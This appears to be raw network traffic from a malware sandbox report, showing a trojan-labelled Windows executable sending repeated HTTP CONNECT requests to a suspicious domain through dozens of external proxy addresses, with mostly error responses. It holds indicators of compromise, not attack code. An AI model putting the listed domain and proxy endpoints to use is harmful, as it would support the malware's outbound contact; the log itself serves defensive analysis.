                                                                                Feb 23, 2024 14:28:27.359864950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                752192.168.2.852458104.19.217.219805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.360387087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.447901964 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                753192.168.2.852383211.222.252.187805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.364691973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                754192.168.2.852464172.67.36.21805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.367645979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.455065012 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                755192.168.2.852478104.16.107.206805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.377706051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.466368914 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                756192.168.2.8523865.44.42.115583865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.385793924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                757192.168.2.852418208.87.131.151371105828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.388318062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.876061916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.398183107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                758192.168.2.85241351.75.126.150118025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.388629913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.876061916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                759192.168.2.85120380.122.170.18241535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.396025896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                760192.168.2.852430130.162.213.17580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.396867990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.582233906 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                Server: squid/6.2-VCS
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 1112
                                                                                X-Squid-Error: ERR_CANNOT_FORWARD 0
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 3e 45 52 52 4f 52 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 74 72 69 65 76 65 20 74 68 65 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 3c 70 3e 3c 62 3e 53 68 69 65 6c 64 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 6f 72 77 61 72 64 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 65 64 20 75 70 73 74 72 65 61 6d 2e 2e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0a 0a 3c 70 20 69 64 3d 22 73 79 73 6d 73 67 22 3e 54 68 65 20 73 79 73 74 65 6d 20 72 65 74 75 72 6e 65 64 3a 20 3c 69 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 69 3e 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 31 33 3a 32 38 3a 32 37 20 47 4d 54 20 62 79 20 45 72 69 63 6f 6d 20 28 65 73 2d 70 72 6f 78 79 2d 61 75 74 68 29 3c 2f 70 3e 0a 3c 21 2d 2d 20 45 52 52
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id=ERR_CANNOT_FORWARD><div id="titles"><h1>ERROR</h1><h2>The requested URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><blockquote id="error"><p><b>Shield is unable to forward your request to the configured upstream..</b></p></blockquote><p id="sysmsg">The system returned: <i>Please try again later.</i></p><br></div><hr><div id="footer"><p>Generated Fri, 23 Feb 2024 13:28:27 GMT by Ericom (es-proxy-auth)</p>... ERR


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                761192.168.2.851948102.68.128.21780805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.405781984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.491786003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.382057905 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                762192.168.2.852397103.146.137.910815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.408415079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                763192.168.2.852482172.65.165.93300005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.428112030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                764192.168.2.852588103.18.46.2504435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.431258917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                765192.168.2.85239043.132.212.77805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.431962967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                766192.168.2.85244045.128.133.22510805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.432936907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                767192.168.2.852592103.18.46.2504435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.432938099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                768192.168.2.852594103.18.46.2504435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.434418917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                769192.168.2.852599103.18.46.2504435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.436012030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                770192.168.2.85245379.143.187.58179055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.446238041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991647959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.695003033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.788969994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.882636070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.992157936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.195050955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                771192.168.2.852495172.67.255.224805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.446609974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.534451962 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                772192.168.2.852434185.219.133.10631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.446990967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.990434885 CET327INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                773192.168.2.852399203.74.125.1888885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.447398901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                774192.168.2.85243145.11.95.16560085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.454488993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991818905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.695065022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.139791965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898175001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                775192.168.2.852457109.247.104.237805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.463222980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.647331953 CET310INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 150
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                776192.168.2.85239839.99.144.43805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.466268063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                777192.168.2.851223188.121.147.1880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.466938019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


